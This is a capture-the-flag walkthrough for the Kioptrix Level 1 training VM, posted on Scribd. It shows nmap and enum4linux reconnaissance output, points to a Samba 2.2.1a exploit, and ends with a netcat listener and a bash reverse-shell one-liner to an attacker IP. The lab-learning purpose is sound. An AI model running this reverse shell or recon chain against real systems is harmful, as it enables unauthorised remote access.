Scribd Logo
Upload

Welcome to Scribd!

  • Kioptrix 1

    Uploaded by

    kolo
    55 views14 pages
    lolo

    Original Title

    Kioptrix1

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    lolo

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    55 views14 pages

    Kioptrix 1

    Uploaded by

    kolo
    lolo

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 14

    Kioptrix: Level 1

    Description of the challenge


    “This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any
    means possible (except actually hacking the VM server or player). The purpose of these games are to
    learn the basic tools and techniques in vulnerability assessment and exploitation. There are more
    ways than one to successfully complete the challenges.”

    Enumeration

    Use netdiscover to find the IP of the vulnerable box.

    netdiscover -i eth0
    After getting the IP I ran NMAP to check the open ports and running services.

    nmap -sV 192.168.33.133


    Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-05-16 06:57 EDT
    Nmap scan report for 192.168.33.133
    Host is up (0.00052s latency).
    Not shown: 65529 closed ports
    PORT STATE SERVICE VERSION
    22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
    | ssh-hostkey:
    | 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
    | 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
    |_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
    |_sshv1: Server supports SSHv1
    80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4
    OpenSSL/0.9.6b)
    | http-methods:
    |_ Potentially risky methods: TRACE
    |_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4
    OpenSSL/0.9.6b
    |_http-title: Test Page for the Apache Web Server on Red Hat Linux
    111/tcp open rpcbind 2 (RPC #100000)
    | rpcinfo:
    | program version port/proto service
    | 100000 2 111/tcp rpcbind
    | 100000 2 111/udp rpcbind
    | 100024 1 1024/tcp status
    |_ 100024 1 1026/udp status
    139/tcp open netbios-ssn Samba smbd (workgroup: kMYGROUP)
    443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4
    OpenSSL/0.9.6b)
    | http-methods:
    |_ Potentially risky methods: TRACE
    |_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4
    OpenSSL/0.9.6b
    |_http-title: Test Page for the Apache Web Server on Red Hat Linux
    | ssl-cert: Subject:
    commonName=localhost.localdomain/organizationName=SomeOrganization/stateOr
    ProvinceName=SomeState/countryName=–
    | Not valid before: 2009-09-26T09:32:06
    |_Not valid after: 2010-09-26T09:32:06
    |_ssl-date: 2017-05-16T11:00:24+00:00; +1m50s from scanner time.
    | sslv2:
    | SSLv2 supported
    | ciphers:
    | SSL2_RC4_128_EXPORT40_WITH_MD5
    | SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
    | SSL2_DES_64_CBC_WITH_MD5
    | SSL2_RC2_128_CBC_WITH_MD5
    | SSL2_DES_192_EDE3_CBC_WITH_MD5
    | SSL2_RC4_128_WITH_MD5
    |_ SSL2_RC4_64_WITH_MD5
    1024/tcp open status 1 (RPC #100024)
    MAC Address: 00:0C:29:D2:DB:A4 (VMware)
    Device type: general purpose
    Running: Linux 2.4.X
    OS CPE: cpe:/o:linux:linux_kernel:2.4
    OS details: Linux 2.4.9 – 2.4.18 (likely embedded)
    Network Distance: 1 hop

    Host script results:


    |_clock-skew: mean: 1m50s, deviation: 0s, median: 1m50s
    |_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC:
    <unknown> (unknown)
    TRACEROUTE
    HOP RTT ADDRESS
    1 0.52 ms 192.168.33.133

    Post-scan script results:


    | clock-skew:
    |_ 1m50s: Majority of systems scanned
    OS and Service detection performed. Please report any incorrect results at
    https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 43.12 second

    CHECK FOR SSH PORT 22


    Tried to connect to SSH but it requires me a password

    CHECK FOR PORT 80 AND 443

    For the Apache port 80 and 443 I ran a dirbuster to check for hidden directories or pages
    NMAP detected port 139 running on Samba.
    I ran nbtscan.
    nbtscan 192.168.33.133

    Run enum4linux to get more details about it.

    enum4linux 192.168.33.133

    ========================== | Target Information |


    ==========================
    Target ……….. 192.168.33.133
    RID Range …….. 500-550,1000-1050
    Username ……… ‖
    Password ……… ‖
    Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
    ======================================================
    | Enumerating Workgroup/Domain on 192.168.33.133 |
    ======================================================
    [+] Got domain/workgroup name: MYGROUP

    ==============================================
    | Nbtstat Information for 192.168.33.133 |
    ==============================================
    Looking up status of 192.168.33.133
    KIOPTRIX <00> – B <ACTIVE> Workstation Service
    KIOPTRIX <03> – B <ACTIVE> Messenger Service
    KIOPTRIX <20> – B <ACTIVE> File Server Service
    ..__MSBROWSE__. <01> – <GROUP> B <ACTIVE> Master Browser
    MYGROUP <00> – <GROUP> B <ACTIVE> Domain/Workgroup Name
    MYGROUP <1d> – B <ACTIVE> Master Browser
    MYGROUP <1e> – <GROUP> B <ACTIVE> Browser Service Elections

    MAC Address = 00-00-00-00-00-00

    =======================================
    | Session Check on 192.168.33.133 |
    =======================================
    [+] Server 192.168.33.133 allows sessions using username ‖, password ‖

    =============================================
    | Getting domain SID for 192.168.33.133 |
    =============================================
    Domain Name: MYGROUP
    Domain Sid: (NULL SID)
    [+] Can‘t determine if host is part of domain or part of a workgroup

    ========================================
    | OS information on 192.168.33.133 |
    ========================================
    [+] Got OS info for 192.168.33.133 from smbclient: Domain=[MYGROUP] OS=[Unix]
    Server=[Samba 2.2.1a]
    [+] Got OS info for 192.168.33.133 from srvinfo:
    KIOPTRIX Wk Sv PrQ Unx NT SNT Samba Server
    platform_id : 500
    os version : 4.5
    server type : 0x9a03

    ===============================
    | Users on 192.168.33.133 |
    ===============================
    Use of uninitialized value $users in print at ./enum4linux.pl line 874.
    Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

    Use of uninitialized value $users in print at ./enum4linux.pl line 888.


    Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

    ===========================================
    | Share Enumeration on 192.168.33.133 |
    ===========================================
    WARNING: The ―syslog‖ option is deprecated
    Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
    Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]

    Sharename Type Comment


    ——— —- ——-
    IPC$ IPC IPC Service (Samba Server)
    ADMIN$ IPC IPC Service (Samba Server)

    Server Comment
    ——— ——-
    KIOPTRIX Samba Server

    Workgroup Master
    ——— ——-
    MYGROUP KIOPTRIX
    WORKGROUP BLADEISM

    [+] Attempting to map shares on 192.168.33.133


    //192.168.33.133/IPC$ [E] Can‘t understand response:
    WARNING: The ―syslog‖ option is deprecated
    Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
    NT_STATUS_NETWORK_ACCESS_DENIED listing \*
    //192.168.33.133/ADMIN$ [E] Can‘t understand response:
    WARNING: The ―syslog‖ option is deprecated
    Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
    tree connect failed: NT_STATUS_WRONG_PASSWORD

    ======================================================
    | Password Policy Information for 192.168.33.133 |
    ======================================================
    [E] Unexpected error from polenum:

    [+] Attaching to 192.168.33.133 using a NULL share


    [+] Trying protocol 445/SMB…

    [!] Protocol failed: [Errno 111] Connection refused (192.168.33.133:445)

    [+] Trying protocol 139/SMB…

    [!] Protocol failed: (‗unpack requires a string argument of length 4‘, ―When unpacking
    field ‗representation | <L=0x10 | ‗\\x00′[:4]'‖)

    [+] Retieved partial password policy with rpcclient:

    Password Complexity: Disabled


    Minimum Password Length: 0
    ================================
    | Groups on 192.168.33.133 |
    ================================

    [+] Getting builtin groups:


    group:[Administrators] rid:[0x220]
    group:[Users] rid:[0x221]
    group:[Guests] rid:[0x222]
    group:[Power Users] rid:[0x223]
    group:[Account Operators] rid:[0x224]
    group:[System Operators] rid:[0x225]
    group:[Print Operators] rid:[0x226]
    group:[Backup Operators] rid:[0x227]
    group:[Replicator] rid:[0x228]

    [+] Getting builtin group memberships:


    Group ‗Print Operators‘ (RID: 550) has member: Couldn‘t find group Print Operators
    Group ‗Replicator‘ (RID: 552) has member: Couldn‘t find group Replicator
    Group ‗Account Operators‘ (RID: 548) has member: Couldn‘t find group Account
    Operators
    Group ‗Power Users‘ (RID: 547) has member: Couldn‘t find group Power Users
    Group ‗Guests‘ (RID: 546) has member: Couldn‘t find group Guests
    Group ‗Administrators‘ (RID: 544) has member: Couldn‘t find group Administrators
    Group ‗Backup Operators‘ (RID: 551) has member: Couldn‘t find group Backup
    Operators
    Group ‗Users‘ (RID: 545) has member: Couldn‘t find group Users
    Group ‗System Operators‘ (RID: 549) has member: Couldn‘t find group System
    Operators
    [+] Getting local groups:
    group:[sys] rid:[0x3ef]
    group:[tty] rid:[0x3f3]
    group:[disk] rid:[0x3f5]
    group:[mem] rid:[0x3f9]
    group:[kmem] rid:[0x3fb]
    group:[wheel] rid:[0x3fd]
    group:[man] rid:[0x407]
    group:[dip] rid:[0x439]
    group:[lock] rid:[0x455]
    group:[users] rid:[0x4b1]
    group:[slocate] rid:[0x413]
    group:[floppy] rid:[0x40f]
    group:[utmp] rid:[0x415]

    [+] Getting local group memberships:

    [+] Getting domain groups:


    group:[Domain Admins] rid:[0x200]
    group:[Domain Users] rid:[0x201]

    [+] Getting domain group memberships:


    Group ‗Domain Users‘ (RID: 513) has member: Couldn‘t find group Domain Users
    Group ‗Domain Admins‘ (RID: 512) has member: Couldn‘t find group Domain Admins

    ============================================================
    =============
    | Users on 192.168.33.133 via RID cycling (RIDS: 500-550,1000-1050) |
    ============================================================
    =============
    [I] Found new SID: S-1-5-21-4157223341-3243572438-1405127623
    [+] Enumerating users using SID S-1-5-21-4157223341-3243572438-1405127623 and
    logon username ‖, password ‖
    S-1-5-21-4157223341-3243572438-1405127623-500 KIOPTRIX\
    (0)
    S-1-5-21-4157223341-3243572438-1405127623-501 KIOPTRIX\ (0)
    S-1-5-21-4157223341-3243572438-1405127623-502
    KIOPTRIX\unix_group.2147483399 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-503
    KIOPTRIX\unix_group.2147483399 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-504
    KIOPTRIX\unix_group.2147483400 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-505
    KIOPTRIX\unix_group.2147483400 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-506
    KIOPTRIX\unix_group.2147483401 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-507
    KIOPTRIX\unix_group.2147483401 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-508
    KIOPTRIX\unix_group.2147483402 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-509
    KIOPTRIX\unix_group.2147483402 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-510
    KIOPTRIX\unix_group.2147483403 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-511
    KIOPTRIX\unix_group.2147483403 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-512 KIOPTRIX\Domain Admins (Local
    Group)
    S-1-5-21-4157223341-3243572438-1405127623-513 KIOPTRIX\Domain Users (Local
    Group)
    S-1-5-21-4157223341-3243572438-1405127623-514 KIOPTRIX\Domain Guests (Local
    Group)
    S-1-5-21-4157223341-3243572438-1405127623-515
    KIOPTRIX\unix_group.2147483405 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-516
    KIOPTRIX\unix_group.2147483406 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-517
    KIOPTRIX\unix_group.2147483406 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-518
    KIOPTRIX\unix_group.2147483407 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-519
    KIOPTRIX\unix_group.2147483407 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-520
    KIOPTRIX\unix_group.2147483408 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-521
    KIOPTRIX\unix_group.2147483408 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-522
    KIOPTRIX\unix_group.2147483409 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-523
    KIOPTRIX\unix_group.2147483409 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-524
    KIOPTRIX\unix_group.2147483410 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-525
    KIOPTRIX\unix_group.2147483410 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-526
    KIOPTRIX\unix_group.2147483411 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-527
    KIOPTRIX\unix_group.2147483411 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-528
    KIOPTRIX\unix_group.2147483412 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-529
    KIOPTRIX\unix_group.2147483412 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-530
    KIOPTRIX\unix_group.2147483413 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-531
    KIOPTRIX\unix_group.2147483413 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-532
    KIOPTRIX\unix_group.2147483414 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-533
    KIOPTRIX\unix_group.2147483414 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-534
    KIOPTRIX\unix_group.2147483415 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-535
    KIOPTRIX\unix_group.2147483415 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-536
    KIOPTRIX\unix_group.2147483416 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-537
    KIOPTRIX\unix_group.2147483416 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-538
    KIOPTRIX\unix_group.2147483417 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-539
    KIOPTRIX\unix_group.2147483417 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-540
    KIOPTRIX\unix_group.2147483418 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-541
    KIOPTRIX\unix_group.2147483418 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-542
    KIOPTRIX\unix_group.2147483419 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-543
    KIOPTRIX\unix_group.2147483419 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-544
    KIOPTRIX\unix_group.2147483420 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-545
    KIOPTRIX\unix_group.2147483420 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-546
    KIOPTRIX\unix_group.2147483421 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-547
    KIOPTRIX\unix_group.2147483421 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-548
    KIOPTRIX\unix_group.2147483422 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-549
    KIOPTRIX\unix_group.2147483422 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-550
    KIOPTRIX\unix_group.2147483423 (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-1000 KIOPTRIX\root (Local User)
    S-1-5-21-4157223341-3243572438-1405127623-1001 KIOPTRIX\root (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-1002 KIOPTRIX\bin (Local User)
    S-1-5-21-4157223341-3243572438-1405127623-1003 KIOPTRIX\bin (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-1004 KIOPTRIX\daemon (Local User)
    S-1-5-21-4157223341-3243572438-1405127623-1005 KIOPTRIX\daemon (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-1006 KIOPTRIX\adm (Local User)
    S-1-5-21-4157223341-3243572438-1405127623-1007 KIOPTRIX\sys (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-1008 KIOPTRIX\lp (Local User)
    S-1-5-21-4157223341-3243572438-1405127623-1009 KIOPTRIX\adm (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-1010 KIOPTRIX\sync (Local User)
    S-1-5-21-4157223341-3243572438-1405127623-1011 KIOPTRIX\tty (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-1012 KIOPTRIX\shutdown (Local User)
    S-1-5-21-4157223341-3243572438-1405127623-1013 KIOPTRIX\disk (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-1014 KIOPTRIX\halt (Local User)
    S-1-5-21-4157223341-3243572438-1405127623-1015 KIOPTRIX\lp (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-1016 KIOPTRIX\mail (Local User)
    S-1-5-21-4157223341-3243572438-1405127623-1017 KIOPTRIX\mem (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-1018 KIOPTRIX\news (Local User)
    S-1-5-21-4157223341-3243572438-1405127623-1019 KIOPTRIX\kmem (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-1020 KIOPTRIX\uucp (Local User)
    S-1-5-21-4157223341-3243572438-1405127623-1021 KIOPTRIX\wheel (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-1022 KIOPTRIX\operator (Local User)
    S-1-5-21-4157223341-3243572438-1405127623-1023 KIOPTRIX\unix_group.11 (Local
    Group)
    S-1-5-21-4157223341-3243572438-1405127623-1024 KIOPTRIX\games (Local User)
    S-1-5-21-4157223341-3243572438-1405127623-1025 KIOPTRIX\mail (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-1026 KIOPTRIX\gopher (Local User)
    S-1-5-21-4157223341-3243572438-1405127623-1027 KIOPTRIX\news (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-1028 KIOPTRIX\ftp (Local User)
    S-1-5-21-4157223341-3243572438-1405127623-1029 KIOPTRIX\uucp (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-1030 KIOPTRIX\unix_user.15 (Local
    User)
    S-1-5-21-4157223341-3243572438-1405127623-1031 KIOPTRIX\man (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-1032 KIOPTRIX\unix_user.16 (Local
    User)
    S-1-5-21-4157223341-3243572438-1405127623-1033 KIOPTRIX\unix_group.16 (Local
    Group)
    S-1-5-21-4157223341-3243572438-1405127623-1034 KIOPTRIX\unix_user.17 (Local
    User)
    S-1-5-21-4157223341-3243572438-1405127623-1035 KIOPTRIX\unix_group.17 (Local
    Group)
    S-1-5-21-4157223341-3243572438-1405127623-1036 KIOPTRIX\unix_user.18 (Local
    User)
    S-1-5-21-4157223341-3243572438-1405127623-1037 KIOPTRIX\unix_group.18 (Local
    Group)
    S-1-5-21-4157223341-3243572438-1405127623-1038 KIOPTRIX\unix_user.19 (Local
    User)
    S-1-5-21-4157223341-3243572438-1405127623-1039 KIOPTRIX\floppy (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-1040 KIOPTRIX\unix_user.20 (Local
    User)
    S-1-5-21-4157223341-3243572438-1405127623-1041 KIOPTRIX\games (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-1042 KIOPTRIX\unix_user.21 (Local
    User)
    S-1-5-21-4157223341-3243572438-1405127623-1043 KIOPTRIX\slocate (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-1044 KIOPTRIX\unix_user.22 (Local
    User)
    S-1-5-21-4157223341-3243572438-1405127623-1045 KIOPTRIX\utmp (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-1046 KIOPTRIX\squid (Local User)
    S-1-5-21-4157223341-3243572438-1405127623-1047 KIOPTRIX\squid (Local Group)
    S-1-5-21-4157223341-3243572438-1405127623-1048 KIOPTRIX\unix_user.24 (Local
    User)
    S-1-5-21-4157223341-3243572438-1405127623-1049 KIOPTRIX\unix_group.24 (Local
    Group)
    S-1-5-21-4157223341-3243572438-1405127623-1050 KIOPTRIX\unix_user.25 (Local
    User)

    ===============================================
    | Getting printer info for 192.168.33.133 |
    ===============================================
    No printers returned.
    enum4linux complete on Tue May 16 07:48:13 2017

    Exploitation
    Googled Samba 2.2.1a and found an exploit.
    https://www.exploit-db.com/exploits/10/
    I downloaded the exploit using wget.

    Compile and run


    Started a netcat listener at port 4444.
    nc -nlvp 4444
    Then use this command to connect back to our attacking box.
    bash -i >& /dev/tcp/192.168.33.129/4444 0>&1

    End…….

    You might also like